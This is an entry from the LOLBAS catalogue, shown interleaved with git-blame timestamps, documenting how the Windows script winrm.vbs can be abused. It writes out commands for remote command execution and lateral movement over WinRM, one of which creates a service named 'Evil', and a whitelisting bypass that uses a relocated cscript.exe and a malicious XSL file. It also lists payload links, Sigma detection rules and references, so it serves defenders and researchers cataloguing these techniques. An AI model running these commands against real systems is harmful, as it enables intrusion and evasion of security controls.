2018-06-09 00:15:06 +02:00
---
2018-09-26 11:41:58 +02:00
Name : winrm.vbs
Description : Script used for manage Windows RM settings
Author : 'Oddvar Moe'
2021-01-10 16:04:52 +01:00
Created : 2018-05-25
2018-06-09 00:15:06 +02:00
Commands :
2018-09-26 11:41:58 +02:00
- Command : 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
Description : Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
Usecase : Proxy execution
Category : Execute
Privileges : User
MitreID : T1216
2021-12-14 16:50:17 +01:00
OperatingSystem : Windows 10, Windows 11
2021-12-14 17:50:22 +01:00
- Command : 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
2018-09-26 11:41:58 +02:00
Description : Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase : Proxy execution
Category : Execute
2021-12-14 17:50:22 +01:00
Privileges : Admin
2018-09-26 11:41:58 +02:00
MitreID : T1216
2021-12-14 16:50:17 +01:00
OperatingSystem : Windows 10, Windows 11
2018-10-25 21:24:55 +02:00
- Command : '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
2022-05-05 12:12:22 +02:00
Description : Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
Usecase : Execute arbitrary, unsigned code via XSL script
2018-10-04 16:07:02 +02:00
Category : AWL Bypass
Privileges : User
2022-05-05 12:12:22 +02:00
MitreID : T1220
2021-12-14 16:50:17 +01:00
OperatingSystem : Windows 10, Windows 11
2018-12-10 14:28:12 +01:00
Full_Path :
2018-09-26 11:41:58 +02:00
- Path : C:\Windows\System32\winrm.vbs
- Path : C:\Windows\SysWOW64\winrm.vbs
2021-01-10 16:04:52 +01:00
Code_Sample :
2018-09-26 11:41:58 +02:00
- Code : https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
- Code : https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
Detection :
2021-11-15 14:19:03 +01:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/10b70edff055cfb12b16d934c77f9ccf4b97a529/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml
- Sigma : https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/process_creation/win_susp_winrm_execution.yml
- Sigma : https://github.com/SigmaHQ/sigma/blob/3107ede1c4d253c89a26f3a0be79122a3a562f29/rules/windows/file_event/file_event_winrm_awl_bypass.yml
- BlockRule : https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
2018-06-09 00:15:06 +02:00
Resources :
2018-09-26 11:41:58 +02:00
- Link : https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
- Link : https://www.youtube.com/watch?v=3gz1QmiMhss
- Link : https://github.com/enigma0x3/windows-operating-system-archaeology
- Link : https://redcanary.com/blog/lateral-movement-winrm-wmi/
- Link : https://twitter.com/bohops/status/994405551751815170
2018-10-04 16:07:02 +02:00
- Link : https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
- Link : https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
2018-09-26 11:41:58 +02:00
Acknowledgement :
2018-10-04 16:08:21 +02:00
- Person : Matt Graeber
Handle : '@mattifestation'
2018-09-26 11:41:58 +02:00
- Person : Matt Nelson
Handle : '@enigma0x3'
- Person : Casey Smith
Handle : '@subtee'
- Person : Jimmy
Handle : '@bohops'
- Person : Red Canary Company cc Tony Lambert
Handle : '@redcanaryco'
2018-10-04 16:07:02 +02:00
---